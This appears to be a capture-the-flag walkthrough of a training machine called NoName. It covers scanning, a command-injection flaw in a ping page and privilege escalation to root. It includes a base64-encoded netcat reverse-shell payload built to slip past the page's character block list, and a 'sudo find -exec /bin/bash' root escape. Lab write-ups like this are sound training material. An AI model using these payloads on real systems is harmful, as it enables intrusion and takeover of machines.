OffSec PG - NoName


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → os_info

PortServiceOther details (if any)
80HTTPApache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/raft-small-words.txt -x html,php,txt

Directories/files listed →

  • index.php
  • icons/
  • superadmin.php


Looking at superadmin.php, it seems like a ping command and thus may be vulnerable to command injection. Using ; didn’t work, neither did &&. | did work and using it to print the code of the file like | cat superadmin.php shows that ";","&&","/","bin","&"," &&","ls","nc","dir","pwd" are all blocked.

Therefore, escaping the blocks by using

1 | `echo bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMjI1IDMwMDIK | base64 -d`

This gives a shell as the www-data user and thus the user flag.

Privilege Escalation


Looking at the /etc/passwd file, the users of importance are root, haclabs and yash. Used find / -type f -user yash 2>/dev/null to list files owned by yash and this prints a file /usr/share/hidden/.passwd. Looking at the permissions, it is world readable.

The contents of the file is a password haclabs1234. This works for the credentials haclabs:haclabs1234. This grants a shell as haclabs user. Looking at sudo -l, this user can run /usr/bin/find as root without any password. Thus, using the command sudo find . -exec /bin/bash \; -quit, a root shell can be gained. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.